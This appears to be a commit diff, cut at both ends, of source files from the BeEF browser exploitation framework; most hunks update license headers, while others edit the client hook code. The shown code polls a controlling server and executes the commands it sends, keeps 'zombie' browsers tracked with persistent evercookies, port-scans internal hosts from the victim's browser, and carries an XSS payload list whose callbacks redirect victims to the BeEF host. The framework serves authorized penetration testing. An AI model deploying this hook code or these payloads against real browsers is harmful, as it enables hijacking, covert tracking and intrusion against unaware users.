xhr.open(method, url, true);
xhr.onerror = function() {
};
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
}
};
xhr.send(data);
}
} else if (typeof XDomainRequest != "undefined") {
xhr = new XDomainRequest();
xhr.open(method, url);
xhr.onerror = function() {
};
xhr.onload = function() {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
};
xhr.send(data);
} else {
if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
}
}
};
beef.regCmp('beef.net.cors');

19
core/main/client/net/dns.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.dns
*
@@ -52,7 +43,7 @@ beef.net.dns = {
// sends a DNS request
sendQuery = function(query) {
//console.log("Requesting: "+query);
beef.debug("Requesting: "+query);
var img = new Image;
img.src = "http://"+query;
img.onload = function() { dom.removeChild(this); }

17
core/main/client/net/local.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.local
*

117
core/main/client/net/portscanner.js
View File

@@ -1,63 +1,54 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*!
* @literal object: beef.net.portscanner
*
* Provides port scanning functions for the zombie. A mod of pdp's scanner
*
* Version: '0.1',
* author: 'Petko Petkov',
* homepage: 'http://www.gnucitizen.org'
*/
beef.net.portscanner = {
scanPort: function(callback, target, port, timeout)
{
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
},
scanTarget: function(callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index < ports.length; index++) {
this.scanPort(callback, target, ports[index], timeout);
};
}
};
beef.regCmp('beef.net.portscanner');
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.portscanner
*
* Provides port scanning functions for the zombie. A mod of pdp's scanner
*
* Version: '0.1',
* author: 'Petko Petkov',
* homepage: 'http://www.gnucitizen.org'
*/
beef.net.portscanner = {
scanPort: function(callback, target, port, timeout)
{
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
},
scanTarget: function(callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index < ports.length; index++) {
this.scanPort(callback, target, ports[index], timeout);
};
}
};
beef.regCmp('beef.net.portscanner');

17
core/main/client/net/requester.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.requester
*

28
core/main/client/net/xssrays.js
View File

@@ -49,22 +49,20 @@ beef.net.xssrays = {
//browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
{input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
{input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
{input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
{input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
{input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
// util function. Print string to the console only if the debug flag is on and the browser is not IE.
printDebug:function(log) {
if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
console.log("[XssRays] " + log);
beef.debug("[XssRays] " + log);
}
},
@@ -340,8 +338,8 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -368,7 +366,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = vector.input.replace(/XSS/g, beefCallback);
@@ -424,7 +422,7 @@ beef.net.xssrays = {
beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+ "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+ "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

61
core/main/client/os.js
View File

@@ -1,24 +1,15 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.os = {
ua: navigator.userAgent,
isWin311: function() {
return (this.ua.indexOf("Win16") != -1) ? true : false;
return (this.ua.match('(Win16)')) ? true : false;
},
isWinNT4: function() {
@@ -28,18 +19,25 @@ beef.os = {
isWin95: function() {
return (this.ua.match('(Windows 95)|(Win95)|(Windows_95)')) ? true : false;
},
isWinCE: function() {
return (this.ua.match('(Windows CE)')) ? true : false;
},
isWin98: function() {
return (this.ua.match('(Windows 98)|(Win98)')) ? true : false;
},
isWinME: function() {
return (this.ua.indexOf('Windows ME') != -1) ? true : false;
return (this.ua.match('(Windows ME)|(Win 9x 4.90)')) ? true : false;
},
isWin2000: function() {
return (this.ua.match('(Windows NT 5.0)|(Windows 2000)')) ? true : false;
},
isWin2000SP1: function() {
return (this.ua.match('Windows NT 5.01 ')) ? true : false;
},
isWinXP: function() {
return (this.ua.match('(Windows NT 5.1)|(Windows XP)')) ? true : false;
@@ -56,6 +54,10 @@ beef.os = {
isWin7: function() {
return (this.ua.match('(Windows NT 6.1)|(Windows NT 7.0)')) ? true : false;
},
isWin8: function() {
return (this.ua.match('(Windows NT 6.2)')) ? true : false;
},
isOpenBSD: function() {
return (this.ua.indexOf('OpenBSD') != -1) ? true : false;
@@ -112,19 +114,26 @@ beef.os = {
isBeOS: function() {
return (this.ua.match('BeOS')) ? true : false;
},
isWindows: function() {
return this.isWin311() || this.isWinNT4() || this.isWinCE() || this.isWin95() || this.isWin98() || this.isWinME() || this.isWin2000() || this.isWin2000SP1() || this.isWinXP() || this.isWinServer2003() || this.isWinVista() || this.isWin7() || this.isWin8() || this.isWinPhone();
},
getName: function() {
//windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWinXP()) return 'Windows XP';
//Windows
if(this.isWin311()) return 'Windows 3.11';
if(this.isWinNT4()) return 'Windows NT 4';
if(this.isWinCE()) return 'Windows CE';
if(this.isWin95()) return 'Windows 95';
if(this.isWin98()) return 'Windows 98';
if(this.isWinME()) return 'Windows Millenium';
if(this.isWin2000()) return 'Windows 2000';
if(this.isWin2000SP1()) return 'Windows 2000 SP1';
if(this.isWinXP()) return 'Windows XP';
if(this.isWinServer2003()) return 'Windows Server 2003';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWinVista()) return 'Windows Vista';
if(this.isWin7()) return 'Windows 7';
if(this.isWin8()) return 'Windows 8';
//Nokia
if(this.isNokia()) {

51
core/main/client/session.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.session
*
@@ -22,7 +13,8 @@ beef.session = {
hook_session_id_length: 80,
hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(),
ec: new evercookie(),
beefhook: "<%= @hook_session_name %>",
/**
* Gets a string which will be used to identify the hooked browser session
@@ -31,12 +23,12 @@ beef.session = {
*/
get_hook_session_id: function() {
// check if the browser is already known to the framework
var id = this.ec.evercookie_cookie("BEEFHOOK");
var id = this.ec.evercookie_cookie(beef.session.beefhook);
if (typeof id == 'undefined') {
var id = this.ec.evercookie_userdata("BEEFHOOK");
var id = this.ec.evercookie_userdata(beef.session.beefhook);
}
if (typeof id == 'undefined') {
var id = this.ec.evercookie_window("BEEFHOOK");
var id = this.ec.evercookie_window(beef.session.beefhook);
}
// if the browser is not known create a hook session id and set it
@@ -56,9 +48,9 @@ beef.session = {
*/
set_hook_session_id: function(id) {
// persist the hook session id
this.ec.evercookie_cookie("BEEFHOOK", id);
this.ec.evercookie_userdata("BEEFHOOK", id);
this.ec.evercookie_window("BEEFHOOK", id);
this.ec.evercookie_cookie(beef.session.beefhook, id);
this.ec.evercookie_userdata(beef.session.beefhook, id);
this.ec.evercookie_window(beef.session.beefhook, id);
},
/**
@@ -77,26 +69,7 @@ beef.session = {
}
return hook_session_id;
},
/**
* Overrides each link, and creates an iframe (loading the href) instead of following the link
*/
persistent: function() {
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{
e.preventDefault();
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = "no";
document.documentElement.style.overflow = 'hidden';
}
});
}
};
beef.regCmp('beef.session');

17
core/main/client/timeout.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*
Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-domain situations,

48
core/main/client/updater.js
View File

@@ -1,29 +1,21 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @Literal object: beef.updater
*
* Object in charge of getting new commands from the BeEF framework and execute them.
* The XHR-polling channel is managed here. If WebSockets are enabled,
* websocket.ls is used instead.
*/
beef.updater = {
// Low timeouts combined with the way the framework sends commamd modules result
// in instructions being sent repeatedly or complex code.
// If you suffer from ADHD, you can decrease this setting.
timeout: 5000,
// XHR-polling timeout.
xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
beefhook: "<%= @hook_session_name %>",
// A lock.
lock: false,
@@ -51,22 +43,22 @@ beef.updater = {
beef.net.flush();
if(beef.commands.length > 0) {
this.execute_commands();
}
else {
}else {
this.get_commands(); /*Polling*/
}
}
// ( typeof beef.websocket === "undefined")
setTimeout("beef.updater.check();", beef.updater.timeout);
setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
},
// Gets new commands from the framework.
get_commands: function(http_response) {
/**
* Gets new commands from the framework.
*/
get_commands: function() {
try {
this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0)
beef.updater.execute_commands();
});
@@ -77,13 +69,12 @@ beef.updater = {
this.lock = false;
},
// Executes the received commands if any.
/**
* Executes the received commands, if any.
*/
execute_commands: function() {
if(beef.commands.length == 0) return;
this.lock = true;
/*here execute the command */
while(beef.commands.length > 0) {
command = beef.commands.pop();
try {
@@ -92,7 +83,6 @@ beef.updater = {
console.error('execute_commands - command failed to execute: ' + e.message);
}
}
this.lock = false;
}
};

98
core/main/client/websocket.js
View File

@@ -1,75 +1,91 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
//beef.websocket.socket.send(take answer to server beef)
/*New browser init call this */
/**
* @Literal object: beef.websocket
*
* Manage the WebSocket communication channel.
* This channel is much faster and responsive, and it's used automatically
* if the browser supports WebSockets AND beef.http.websocket.enable = true.
*/
beef.websocket = {
socket:null,
alive_timer:<%= @websocket_timer %>,
ws_poll_timeout: "<%= @ws_poll_timeout %>",
/**
* Initialize the WebSocket client object.
* Note: use WebSocketSecure only if the hooked domain is under https.
* Mixed-content in WS is quite different from a non-WS context.
*/
init:function () {
var webSocketServer = beef.net.host;
var webSocketPort = <%= @websocket_port %>;
var webSocketSecure = <%= @websocket_secure %>;
var webSocketPort = "<%= @websocket_port %>";
var webSocketSecure = "<%= @websocket_secure %>";
var protocol = "ws://";
//console.log("We are inside init");
/*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
if(webSocketSecure && window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= <%= @websocket_sec_port %>;
webSocketPort= "<%= @websocket_sec_port %>";
}
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
} else {
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}else{
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
/* send Helo message to the BeEF server and start async communication*/
/**
* Send Helo message to the BeEF server and start async polling.
*/
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
//console.log("Socket has been opened!");
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
//console.log("Connected and Helo");
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
beef.websocket.alive();
}
};
this.socket.onmessage = function (message) {
//console.log("Received message via WS."+ message.data);
eval(message.data);
}
// Data coming from the WebSocket channel is either of String, Blob or ArrayBufferdata type.
// That's why it needs to be evaluated first. Using Function is a bit better than pure eval().
// It's not a big deal anyway, because the eval'ed data comes from BeEF itself, so it is implicitly trusted.
new Function(message.data)();
};
this.socket.onclose = function () {
setTimeout(function(){beef.websocket.start()}, 5000);
};
},
/**
* Send data back to BeEF. This is basically the same as beef.net.send,
* but doesn't queue commands.
* Example usage:
* beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
* '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
* '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
*/
send:function (data) {
this.socket.send(data);
// console.log("Sent [" + data + "]");
try {
this.socket.send(data);
}catch(err){}
},
/**
* Polling mechanism, to notify the BeEF server that the browser is still hooked,
* and the WebSocket channel still alive.
* todo: there is probably a more efficient way to do this. Double-check WebSocket API.
*/
alive: function (){
beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
// console.log("sent alive");
setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
}
};

16
core/main/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/configuration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

40
core/main/console/banners.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -40,12 +30,13 @@ module Banners
def print_welcome_msg
config = BeEF::Core::Configuration.instance
version = config.get('beef.version')
print_info "Browser Exploitation Framework (BeEF)"
data = "Version #{version}\n"
data += "Website http://beefproject.com\n"
data += "Run 'beef -h' for basic help.\n"
data += "Run 'git pull' to update to the latest revision."
print_info "Browser Exploitation Framework (BeEF) #{version}"
data = "Twit: @beefproject\n"
data += "Site: http://beefproject.com\n"
data += "Blog: http://blog.beefproject.com\n"
data += "Wiki: https://github.com/beefproject/beef/wiki\n"
print_more data
print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
end
#
@@ -95,7 +86,7 @@ module Banners
print_success "running on network interface: #{host}"
beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
data += "UI URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
print_more data
end
@@ -106,13 +97,12 @@ module Banners
#
def print_loaded_extensions
extensions = BeEF::Extensions.get_loaded
print_info "#{extensions.size} extensions loaded:"
print_info "#{extensions.size} extensions enabled."
output = ''
extensions.each do |key,ext|
output += "#{ext['name']}\n"
end
#extensions.each do |key,ext|
# output += "#{ext['name']}\n"
#end
print_more output
end

16
core/main/console/commandline.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/constants/browsers.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
